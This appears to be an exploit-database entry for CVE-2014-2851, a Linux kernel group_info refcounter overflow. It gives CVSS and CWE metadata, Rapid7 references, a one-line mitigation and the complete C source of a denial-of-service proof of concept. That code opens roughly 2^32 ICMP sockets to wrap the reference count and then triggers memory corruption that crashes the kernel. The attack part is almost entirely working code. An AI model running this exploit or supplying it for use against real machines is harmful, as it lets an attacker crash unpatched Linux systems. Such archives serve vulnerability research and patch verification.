DoS poc for CVE-2014-2851

vendor:

N/A

by:

Tohmaxx

7,2

CVSS

HIGH

Linux group_info refcounter overflow memory corruption

119

CWE

Product Name: N/A

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: CVE-2014-2851

CPE: N/A

Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1168/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2014-2851/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-2851/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2014

This exploit is a proof-of-concept (PoC) code for CVE-2014-2851, which is a Linux group_info refcounter overflow memory corruption vulnerability. The code is written in C and is designed to crash the system if the app does not crash. It takes a while to execute because it calls 2^32 socket() calls.

Mitigation:

The best way to mitigate this vulnerability is to update the system with the latest security patches.

Source

Exploit-DB raw data:

/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */

#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL<<32) - 20 ;
    if(argc >= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i < count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 << 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}